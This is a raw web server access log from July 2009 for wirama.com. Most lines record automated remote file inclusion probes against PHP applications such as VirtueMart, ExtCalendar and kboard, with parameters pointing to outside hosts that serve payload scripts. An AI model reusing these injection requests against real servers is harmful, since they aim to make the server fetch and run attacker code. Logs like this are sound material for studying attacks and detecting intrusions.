124.0.139.129 - - [01/Jul/2009:18:48:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:49:49 -0700] "GET /logs/access_090330.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:50:08 -0700] "GET /logs/access_090330.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:50:21 -0700] "GET /logs/access_090601.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:18:50:39 -0700] "GET /logs/access_090601.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:18:50:42 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:53:03 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:53:21 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:18:53:53 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.125.38.117 - - [01/Jul/2009:18:53:54 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.125.38.117 - - [01/Jul/2009:18:53:57 -0700] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:18:54:01 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:18:54:10 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:18:56:44 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "wirama.com"
87.118.116.72 - - [01/Jul/2009:18:56:44 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "wirama.com"
87.118.116.72 - - [01/Jul/2009:18:57:06 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:18:57:06 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:18:57:06 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:19:09:29 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:19:09:29 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:03 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 200 2382 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:03 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 200 918 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:03 -0700] "GET /logs/access_090330.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:09 -0700] "GET /logs/access_090330.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:09 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:09 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 2382 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:09 -0700] "GET /logs/access_090330.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:09 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:09 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 2382 "-" "Mozilla/5.0" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:19:11:09 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:24 -0700] "GET /logs/access_090601.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
87.118.116.72 - - [01/Jul/2009:19:11:53 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "wirama.com"
87.118.116.72 - - [01/Jul/2009:19:11:53 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:54 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 200 918 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:54 -0700] "GET /logs/access_090330.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:11:54 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 200 2382 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:18 -0700] "GET /logs/access_090330.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:18 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:18 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 2382 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:18 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:19 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:19 -0700] "GET /logs/access_090330.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:19 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 2382 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:19:12:24 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:19:12:24 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:19:12:24 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:12:58 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:13:30 -0700] "GET /logs/access_090330.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:14:03 -0700] "GET /logs/access_090330.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:19:14:15 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:19:14:15 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:14:16 -0700] "GET /logs/access_090601.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:19:14:20 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:14:51 -0700] "GET /logs/access_090601.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:15:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
122.153.28.140 - - [01/Jul/2009:19:17:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:19:17:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:19:17:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:19:17:35 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:19:17:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.153.28.140 - - [01/Jul/2009:19:17:35 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:19:22:26 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:22:48 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:29:05 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:19:34:24 -0700] "GET /logs/access_090401.log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:38:24 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:39:31 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:41:03 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:42:23 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:42:56 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:43:21 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:48:05 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
92.50.143.90 - - [01/Jul/2009:19:51:55 -0700] "GET //?_zb_path=http://eng.nevskydvor.ru/php/id1.txt?%0D?? HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.wirama.com"
92.50.143.90 - - [01/Jul/2009:19:51:55 -0700] "GET /logs///?_zb_path=http://eng.nevskydvor.ru/php/id1.txt?%0D?? HTTP/1.1" 200 2380 "-" "libwww-perl/5.803" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:19:52:26 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:19:52:26 -0700] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.125.38.117 - - [01/Jul/2009:19:52:27 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.170 - - [01/Jul/2009:19:52:58 -0700] "GET /?S=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
82.194.87.219 - - [01/Jul/2009:19:54:02 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:54:23 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
82.194.87.219 - - [01/Jul/2009:19:54:48 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
92.50.143.90 - - [01/Jul/2009:19:55:47 -0700] "GET //?_zb_path=http://eng.nevskydvor.ru/php/id1.txt?%0D?? HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "wirama.com"
92.50.143.90 - - [01/Jul/2009:19:55:47 -0700] "GET /logs///?_zb_path=http://eng.nevskydvor.ru/php/id1.txt?%0D?? HTTP/1.1" 200 2380 "-" "libwww-perl/5.803" "wirama.com"
92.50.143.90 - - [01/Jul/2009:19:57:27 -0700] "GET /logs/access_090330.log///?_zb_path=http://eng.nevskydvor.ru/php/id1.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
92.81.237.101 - - [01/Jul/2009:20:03:31 -0700] "GET /logs/access_090329.log HTTP/1.1" 200 1685256 "-" "il6dh6dFbkj plfkrywxw dtFcfkogtrw" "www.wirama.com"
74.6.17.155 - - [01/Jul/2009:20:08:31 -0700] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
63.246.150.28 - - [01/Jul/2009:20:15:38 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
65.55.106.183 - - [01/Jul/2009:20:16:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
62.140.23.185 - - [01/Jul/2009:20:18:10 -0700] "GET /slogin_lib.inc.php?slogin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
62.140.23.185 - - [01/Jul/2009:20:18:10 -0700] "GET /logs/access_090531.log//slogin_lib.inc.php?slogin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
62.140.23.185 - - [01/Jul/2009:20:18:10 -0700] "GET /logs//slogin_lib.inc.php?slogin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
218.186.12.246 - - [01/Jul/2009:20:22:31 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" "www.wirama.com"
218.186.12.246 - - [01/Jul/2009:20:22:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.wirama.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" "www.wirama.com"
218.186.12.246 - - [01/Jul/2009:20:23:04 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" "www.wirama.com"
218.186.12.246 - - [01/Jul/2009:20:23:14 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" "www.wirama.com"
63.246.150.28 - - [01/Jul/2009:20:24:26 -0700] "GET /logs/access_090601.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
63.246.150.28 - - [01/Jul/2009:20:24:26 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
63.246.150.28 - - [01/Jul/2009:20:24:26 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:14 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:14 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:15 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:22 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:22 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:22 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:24 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:24 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:20:25:24 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.75.203 - - [01/Jul/2009:20:34:17 -0700] "GET /logs//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [01/Jul/2009:20:34:17 -0700] "GET /components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [01/Jul/2009:20:34:28 -0700] "GET /logs//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [01/Jul/2009:20:34:28 -0700] "GET /components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [01/Jul/2009:20:34:40 -0700] "GET /components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
88.191.75.203 - - [01/Jul/2009:20:34:40 -0700] "GET /logs//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "wirama.com"
124.0.139.129 - - [01/Jul/2009:20:34:54 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
